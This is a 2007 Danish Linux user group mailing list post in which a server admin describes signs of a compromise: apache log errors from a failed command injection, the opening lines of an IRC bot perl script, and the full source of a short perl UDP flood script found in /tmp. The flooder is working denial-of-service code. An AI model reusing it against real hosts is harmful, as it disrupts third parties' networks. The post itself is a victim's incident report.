sslug-teknik team mailing list archive

Thread
Date

Re: Bot loaded successfully..... [Baliem Hacker Scanner]

To: sslug-teknik@xxxxxxxx
From: Peter Rude <phr@xxxxxxxx>
Date: Wed, 28 Nov 2007 00:00:54 +0100
Delivered-to: mailing list sslug-teknik@xxxxxxxx
In-reply-to: <fih9vn$3h2$1@www.sslug.dk>
Mailing-list: contact sslug-teknik-help@xxxxxxxx; run by ezmlm
Newsgroups: sslug.teknik
Organization: SSLUG
User-agent: Thunderbird 2.0.0.6 (X11/20070801)

Kristian Vilmann skrev:

> 
> Reinstallerer din server. Du ved ikke hvad den bot har gjort ved dit system.
> 
> /k
> 
> 
Har ikke lige lyst til at geninstallere - I hvert fald ikke en SuSE 9.0
Så jeg rodede lidt i apache's log filer og fandt følgende:

sh: -c: line 2: syntax error near unexpected token `;'
'h: -c: line 2: `; 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm
rm: cannot remove `\r': No such file or directory
sh: line 2: /tmp/cmdtemp: Permission denied
rm: cannot remove `\r': No such file or directory
sh: line 2: /tmp/cmdtemp: Permission denied
rm: cannot remove `\r': No such file or directory
sh: line 2: /tmp/cmdtemp: Permission denied

Hvilket lugter af et fejlslået forsøg på at installere noget snavs -

I mellemtiden er der kommet lidt mere interessant i min /tmp mappe :

scan.txt dateret Nov 27 14:25
Et langt perl script som starten med flg:
----- snip----
#!/usr/bin/perl
#
# Bot ScanBOT v1.0a
# by Bitchx and Morgan
# irc.indoirc.net - #Bitch - #Morgan
#################################################################################################################################################

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

###############CONFIGURATION###################
my $processo = "/usr/local/apache/bin/nscan -DSSL";
my $printcmd=" cmd [FullNetwork]"; #<---- Change this for your CMD
my $server="irc.fullnetwork.org";
my $porta="6667";
----snip----
Den er ikke eksekverbar.

OG:

rsy.txt dateret Nov 27 16:14
Et lille perl script med flg:
---- start ----
#!/usr/bin/perl
#  INC.
#

use Socket;

if (@ARGV < 2) {
    die "[+] labsec udp\n" .
        "[+] perl leet.pl <victim[:victim2:...:victimN]> <tempo> [porta]\n";
}

@sin = map { inet_aton $_ } split /:/, $ARGV[0];
$t   = time +$ARGV[1];

# nazis are comming!!
socket SS, PF_INET, SOCK_DGRAM, 17;

while (1) {
    send SS, 0, 0, sockaddr_in($ARGV[2] || rand 65000, $sin[rand @sin]);
    exit if time >= $t;
}

# ATE AGORA PESSOAS TEM O PROGAMA: 1
# NAO PASSEM PRA NINGUEM!
---slut---
Som heller ikke er eksekverbar.

Kan ikke lige gennemskue funktionen.....

Umiddelbart vil jeg mene at serveren er under angreb - meilserveren har
været usædvanligt belastet at mails til irrelevante adresser, men der er
ikke blevet sendt noget videre ud - jeg kan ikke se nogle tegn på at
angrebet er lykkedes - Der er ikke nogen kunst at skrive til /tmp men
det er en lidt større kunst at afvikle kode der.

Så jeg strammer op på backup'en og holder øje.

/Peter

Follow ups

Re: Bot loaded successfully..... [Baliem Hacker Scanner]
From: Sune Vuorela, 2007-11-28
Re: Bot loaded successfully..... [Baliem Hacker Scanner]
From: Peter Makholm, 2007-11-28
Re: Bot loaded successfully..... [Baliem Hacker Scanner]
From: Bo Simonsen, 2007-11-27

References

Bot loaded successfully..... [Baliem Hacker Scanner]
From: Peter Rude, 2007-11-27
Re: Bot loaded successfully..... [Baliem Hacker Scanner]
From: Kristian Vilmann, 2007-11-27